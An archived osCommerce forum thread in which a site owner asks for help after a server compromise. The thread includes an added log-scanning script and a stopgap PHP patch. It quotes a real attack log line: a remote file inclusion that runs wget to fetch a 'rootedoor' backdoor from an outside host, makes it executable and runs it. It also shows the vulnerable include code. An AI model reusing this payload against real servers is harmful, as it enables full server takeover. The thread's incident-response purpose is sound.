
I need to track down where a security risk is


ervinf


Total server failure has been attributed to our OS-Commerce cart. The official word is:

 

Here is a post from the logs, today, soon after we had everything back up and running:

thefuchsiafrog.com:195.174.225.23 - - [26/Apr/2005:15:55:32 -0500] "GET /catalog/includes/include_once.php?include_file=http://www.fendora.net/asc/xpl/asc.txt?&cmd=cd%20/tmp/;wget%20http://www.fendora.net/asc/xpl/rootedoor;chmod%20777%20rootedoor;./rootedoor HTTP/1.1" 200 6806 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

[is this a line of code from the cart?]

 

To turn that into English, the attacker used a vulnerability in the website's /include_once.php file and altered the $include_file variable to include a file from another website that was placed in the /tmp folder of the server. Using that same opening, they initiated the file and the command to create a backdoor into the server to start doing damage.

 

They continue to say:

We have had to replace and restore the operating system twice, and restore all websites, twice, in a 24 hour period due to a script vulnerability that was used to gain access and corrupt binaries of the operating system.

 

Any and all help would be appreciated.

 

Thanks until we resolve this My client is done. . .

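To help answer the question of which script is being abused, here is an added example (not part of the original posts) that scans access logs in the layout quoted above for requests carrying a remote URL in a query parameter and groups them by virtual host and script. The sample log lines, host names and addresses are constructed; the function and variable names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache combined log format with the virtual host prefixed to the client
# address, matching the layout of the line quoted in the post.
LINE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a remote URL (checked after URL-decoding).
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def remote_include_hits(lines):
    """Return {(vhost, script_path): [request details]} for suspect requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # line is not in the expected format
        path, _, query = m["target"].partition("?")
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if REMOTE_URL.match(unquote(value)):
                hits[(m["vhost"], path)].append({
                    "ip": m["ip"], "time": m["ts"],
                    "param": name, "status": int(m["status"]),
                })
                break  # one record per request is enough
    return dict(hits)


# Constructed sample lines (hosts and addresses are documentation values).
SAMPLE = [
    'shop.example.com:192.0.2.10 - - [26/Apr/2005:15:55:32 -0500] "GET /catalog/includes/include_once.php?include_file=http://files.example.net/a.txt?&cmd=id HTTP/1.1" 200 6806 "-" "Mozilla/4.0"',
    'blog.example.com:198.51.100.7 - - [26/Apr/2005:16:02:10 -0500] "GET /index.php?page=http%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    'shop.example.com:203.0.113.5 - - [26/Apr/2005:16:05:44 -0500] "GET /catalog/product_info.php?products_id=12 HTTP/1.1" 200 9120 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for (vhost, path), reqs in remote_include_hits(SAMPLE).items():
        for r in reqs:
            print(vhost, path, r["param"], r["status"], r["ip"], r["time"])
```

A parameter that legitimately carries a full URL is reported too, so treat the output as a list of scripts to review, starting with those that answered 200.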

Well, problem with that idea is that there is no include_once.php file in osCommerce.

 

It's far more likely that the hacker managed to gain access to an insecure shared temp folder on the server, or it could be that your hosting company is using an out of date version of PHP that is vulnerable to the php_include worm.

 

Either way, it's a matter of server security and nothing to do with osCommerce.

 

Always provided of course that you are referring to an install of osCommerce and not some 'loaded' version of it which does have such a file. In which case it is again not an osCommerce problem.

 

Just a thought! Does your host provide for 1-click automated installs of osCommerce? In which case the auto-installer might come with such a file. Any such file should however be deleted once the install has completed. So that would leave a problem with the automated install programme.

 

Vger


My suggestion to patch the problem for the minute is to change the includes/include_once.php from

 

<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
  }
?>

 

to reflect

 

<?
  // Stop if the value contains "//", as a remote URL such as http://... does.
  if (strstr($include_file, "//")) { die(); }

  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
  }
?>


Archived

This topic is now archived and is closed to further replies.
